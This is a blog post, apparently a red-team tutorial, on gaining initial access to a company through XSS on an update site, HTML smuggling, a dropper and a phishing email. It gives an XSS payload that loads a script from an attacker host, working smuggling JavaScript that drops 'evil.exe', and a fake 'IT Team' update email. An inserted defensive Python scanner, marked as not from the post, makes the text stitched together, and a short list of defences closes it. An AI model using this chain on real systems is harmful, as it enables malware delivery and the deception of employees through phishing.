Initial Access with XSS and HTML Smuggling – Theory

Hi there! In this post, we will discuss how an employee's system can be compromised by chaining a few tricks. We will cover a client-side attack and a chain of techniques: phishing, HTML smuggling, droppers, and so on. I could not build the demo lab yet, but I will as soon as possible, together with a dropper written in C# or C/C++.


First, let me explain the scenario. Our target has a website without authentication from which employees download software updates.

This website has an XSS vulnerability, and we want to use it to compromise the target.

We could start with enumeration and hunting for e-mail addresses, but that is not the focus here; I will skip the enumeration and vulnerability assessment phases.

The employee must download and execute both our malware and the software updater. If our malware crashes or the updater does not run, either one may attract attention. Our JavaScript code downloads our dropper, and the dropper must download and execute both the malware and the updater.

XSS Script (import the external JS and call the function)

<script src="hxxp://domain:port/smuggle.js"></script>
<img src="x" onerror=" base64ToArrayBuffer()">

HTML Smuggling Code (https://github.com/SofianeHamlaoui/Pentest-Notes/blob/master/offensive-security/defense-evasion/file-smuggling-with-html-and-javascript.md)

When we create the malware, encode it with base64 and copy the encoded malware into the file variable.

base64 malw.exe > b64_malw.txt

Smuggle.js:

function base64ToArrayBuffer(base64) {
    var binary_string = window.atob(base64);
    var len = binary_string.length;

    var bytes = new Uint8Array( len );
    for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
    return bytes.buffer;
}

// 32bit simple reverse shell
var file = ''; //Base64 version of malware
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'evil.exe';

if (window.navigator.msSaveOrOpenBlob) {
    window.navigator.msSaveOrOpenBlob(blob,fileName);
} else {
    var a = document.createElement('a');
    console.log(a);
    document.body.appendChild(a);
    a.style = 'display: none';
    var url = window.URL.createObjectURL(blob);
    a.href = url;
    a.download = fileName;
    a.click();
    window.URL.revokeObjectURL(url);
}
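From the defender's side, the smuggle.js pattern above (atob decode, Blob, createObjectURL, forced download) is a usable signature. The following Python scanner is an added example, not code from this post: it flags script sources outside an allowlist, inline event handlers, and the smuggling indicators in fetched script bodies. The allowlisted hostname and both samples are constructed.

```python
import re
# Browser-side HTML smuggling signature: base64 decoded with atob(), wrapped in a
# Blob and written to disk via an anchor's download attribute (or msSaveOrOpenBlob).
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob": re.compile(r"\bnew\s+Blob\s*\("),
    "object_url": re.compile(r"\bcreateObjectURL\s*\("),
    "download_attr": re.compile(r"\.download\s*="),
    "ms_save_blob": re.compile(r"\bmsSaveOrOpenBlob\s*\("),
    "exe_filename": re.compile(r"['\"][^'\"]*\.(?:exe|bat|ps1|scr|dll)['\"]", re.I),
}
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_HANDLER = re.compile(r"\son(?:error|load|click)\s*=", re.I)
HOST = re.compile(r"^(?:[a-z]+:)?//([^/:?#]+)", re.I)  # absolute or scheme-relative URL
def external_scripts(html, allowed_hosts):
    """Script src URLs whose host is outside the allowlist; relative paths pass."""
    hits = []
    for src in SCRIPT_SRC.findall(html):
        m = HOST.match(src)
        if m and m.group(1).lower() not in allowed_hosts:
            hits.append(src)
    return hits

def smuggling_indicators(script_text):
    """Names of the indicators present in one script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]

def assess(html, fetched_scripts, allowed_hosts):
    """Combine page-level and script-level findings; single hits alone are common."""
    found = {i for s in fetched_scripts for i in smuggling_indicators(s)}
    result = {
        "external_scripts": external_scripts(html, allowed_hosts),
        "inline_handlers": len(INLINE_HANDLER.findall(html)),
        "smuggling": sorted(found),
    }
    if {"atob", "blob", "object_url"} <= found and found & {"download_attr", "ms_save_blob"}:
        result["verdict"] = "html_smuggling"
    elif result["external_scripts"]:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "clean"
    return result

# Constructed samples: the injected page fragment and the fetched smuggle.js body.
SAMPLE_HTML = '<script src="hxxp://domain:8080/smuggle.js"></script><img src="x" onerror="base64ToArrayBuffer()">'
SAMPLE_JS = ("var bin = window.atob(file); var blob = new Blob([bytes], {type: 'octet/stream'}); "
             "var a = document.createElement('a'); a.href = window.URL.createObjectURL(blob); "
             "a.download = 'evil.exe'; a.click();")
if __name__ == "__main__":
    print(assess(SAMPLE_HTML, [SAMPLE_JS], {"updates.example.com"}))
```

The page content and script bodies would come from a proxy or a crawl of the update site; a "suspicious" verdict on a page that should only load first-party scripts is already worth a look.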

You can build your own dropper with a batch script or PowerShell, for example one that downloads the executables from GitHub. In this phase you can obfuscate the MSF payload, add injection techniques, etc. In a later post, we will discuss how to obfuscate our malware and evade detection.

For Simple Dropper: https://github.com/tww-software/powershell-dropper-POC

After creating the dropper, encode it with base64 and copy the result into the file variable.

The first part of the attack is done; now we create a mail template and send it to the target addresses. While developing the mails, we should use the company's own mail template if one is available; otherwise, the newsletter of a provider or partner company can serve as a mail template for the target. Done this way, our template will look more credible. And don't forget: the stated purpose of our mail must be updating the systems. If you want to change the colors or keywords in the mail template, take a look at the https://bksecurity.org/social-engineering-phishing-fake-messages-and-more/ post.

Example Template:

<from> it@hckr.com
<to> target
Hi Everyone,
There is an important update for the XYZ software.
You must update your computer software as soon as possible.
Please go to the link for the update process:
<Company Software Update Link>

IT Team

There is a real update, and the link does not look malicious to the users because it is the company's real update link with some differences. When the employee clicks the link above, our JavaScript code triggers the smuggling code and the dropper is downloaded to the user's machine. If the user executes the dropper, it first downloads the malware and the real update, then executes both of them and removes the malware. Our malware runs in memory 🙂

The process is shown in the picture.

Conclusion

  • Use authentication and authorization for public-facing systems; if possible, hide these types of systems from non-employees.
  • Look at the sender of e-mails in detail.
  • If the system is vulnerable and you cannot change the source code, use IP whitelisting to prevent access by attackers. Otherwise, fix the XSS.
  • Don't execute everything, especially .bat and .ps1 files, document macros, etc. If you don't recognise the extension or you think the mail is suspicious, talk to your IT or security team.
  • If you clicked and there is suspicious activity on your computer, contact the IT and security teams and start the IR process.